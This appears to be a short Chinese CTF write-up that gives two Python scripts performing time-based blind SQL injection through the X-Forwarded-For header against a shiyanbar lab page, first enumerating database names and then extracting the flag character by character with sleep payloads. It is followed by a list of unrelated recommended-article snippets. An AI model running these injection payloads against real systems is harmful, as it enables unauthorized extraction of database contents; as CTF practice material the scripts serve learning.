不多说,直接使用脚本跑

 # -*- coding:utf-8 -*-

 import requests

 import string

 url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess = string.lowercase+string.uppercase+string.digits+string.punctuation

 database=[]

 for database_number in range(0,100): #假设爆破前100个库

 databasename=''

 for i in range(1,100): #爆破字符串长度,假设不超过100长度

 flag=0

 for str in guess: #爆破该位置的字符

 #print 'trying ',str

 headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=4)

 except:

 databasename+=str

 flag=1

 print '正在爆破第%d个数据库名,the databasename now is '%(database_number+1) ,databasename

 break

 if flag==0:

 break

 database.append(databasename)

 if i==1 and flag==0:

 print '扫描完成'

 break

 for i in range(len(database)):

 print database[i]

获取数据库名称

然后再获取数据表,列,flag

 #-*-coding:utf-8-*-import requestsimport string

 url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess=string.lowercase + string.uppercase + string.digits

 flag=""

 for i in range(1,100):

 havetry=0

 for str in guess:

 headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=6)

 except requests.exceptions.ReadTimeout, e:

 havetry=1

 flag = flag + str

 print "flag:", flag

 break

 if havetry==0:

 breakprint 'result:' + flag

获取flag

(flag有点长,要跑一会儿)

随机推荐

  1. Android零基础入门第56节:翻转视图ViewFlipper打造引导页和轮播图

    原文:Android零基础入门第56节:翻转视图ViewFlipper打造引导页和轮播图 前面两期学习了 ViewAnimator及其子类ViewSwitcher的使用,以及ViewSwitcher的 ...

  2. 核心思想:互联网创业十问?(大部分创业者是从学习借鉴成功者起步的,不需要把商业模式考虑完备,失败者没资格说趁着年轻...)4种失败的信号 good

    著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处.作者:曹政链接:https://www.zhihu.com/question/20264499/answer/28168079来源: ...

  3. 利用Socket通信

    网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket. 建立网络通信连接至少要一对端口号(socket).socket本质是编程接口(API),对TCP/IP的封装 ...

  4. Delphi事件的广播

    原文地址:Delphi事件的广播 转作者:MondaySoftware 明天就是五一节了,辛苦了好几个月,借此机会应该尽情放松一番.可是想到Blog好久没有写文章,似乎缺些什么似的.这几个月来在项目中 ...

  5. CPU多核控速

    初学者很多对自己开发的软件使用硬件资源的时候并不注意,造成写出的东西不是很满意. 一般有两种情况: 1.写的都是同步单线程任务,不管你电脑有多少个核都不关我事 我就用你1个核所以不管怎么样都不会把CP ...

  6. TStringGrid多选的复制与拷贝

    uses Clipbrd; function StringGridSelectText(mStringGrid: TStringGrid): string; var   I, J: Integer; ...

  7. C++与QML混合编程实现2048

    http://blog.csdn.net/ieearth/article/details/42705305

  8. js一道面试题

    题目是这样的,按照以下函数的结果写一个sub()方法: sub(1)(2)(3);/*return 6*/ sub(4)(3)(3);/*return 10*/ 我的山寨做法: function su ...

  9. 百度AI开放平台,语音识别,语音合成以及短文本相似度

    百度AI开放平台:https://ai.baidu.com/ 语音合成 from aip import AipSpeech APP_ID=" #'你的 App ID' API_KEY=&qu ...

  10. java.lang.ClassNotFoundException: org.jaxen.JaxenException 解决方法

    当遇到如下exception时, May 11, 2017 4:23:17 PM org.apache.catalina.core.StandardWrapperValve invoke SEVERE ...